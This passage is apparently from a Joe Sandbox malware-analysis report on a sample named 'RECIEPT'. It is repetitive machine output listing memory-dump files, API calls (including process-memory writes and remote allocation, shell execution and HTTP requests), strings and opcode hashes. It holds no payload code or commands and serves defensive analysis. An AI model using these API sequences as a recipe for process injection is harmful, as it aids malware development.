                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: \
                                        • API String ID: 4104443479-2967466578
                                        • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                        • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                        • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                        • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                        Strings
                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                        • API String ID: 708495834-557222456
                                        • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                        • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                        • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                        • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                        APIs
                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                        • CoInitialize.OLE32(00000000), ref: 00478442
                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                        • CoUninitialize.OLE32 ref: 0047863C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 886957087-24824748
                                        • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                        • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                        • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                        • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                        APIs
                                          • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                          • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                          • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                          • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                          • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                        • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                        • String ID: @
                                        • API String ID: 4150878124-2766056989
                                        • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                        • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                        • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                        • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: \$]$h
                                        • API String ID: 4104443479-3262404753
                                        • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                        • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                        • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                        • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                        APIs
                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                        • CloseHandle.KERNEL32(?), ref: 00457E09
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                        • String ID: <$@
                                        • API String ID: 2417854910-1426351568
                                        • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                        • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                        • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                        • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 3705125965-3916222277
                                        • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                        • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                        • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                        • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                        APIs
                                        • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                        • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                        • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem
                                        • String ID: 0
                                        • API String ID: 135850232-4108050209
                                        • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                        • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                        • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                        • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
                                        • API String ID: 847901565-1698111956
                                        • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                        • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                        • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                        • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                        APIs
                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window
                                        • String ID: SysMonthCal32
                                        • API String ID: 2326795674-1439706946
                                        • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                        • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                        • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                        • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                        APIs
                                        • DestroyWindow.USER32(00000000), ref: 00450A2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: DestroyWindow
                                        • String ID: msctls_updown32
                                        • API String ID: 3375834691-2298589950
                                        • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                        • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                        • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                        • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: $<
                                        • API String ID: 4104443479-428540627
                                        • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                        • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                        • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                        • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DiskFreeSpace
                                        • String ID: \VH
                                        • API String ID: 1682464887-234962358
                                        • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                        • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                        • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                        • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DiskFreeSpace
                                        • String ID: \VH
                                        • API String ID: 1682464887-234962358
                                        • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                        • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                        • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                        • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DiskFreeSpace
                                        • String ID: \VH
                                        • API String ID: 1682464887-234962358
                                        • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                        • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                        • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                        • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume
                                        • String ID: \VH
                                        • API String ID: 2507767853-234962358
                                        • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                        • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                        • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                        • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
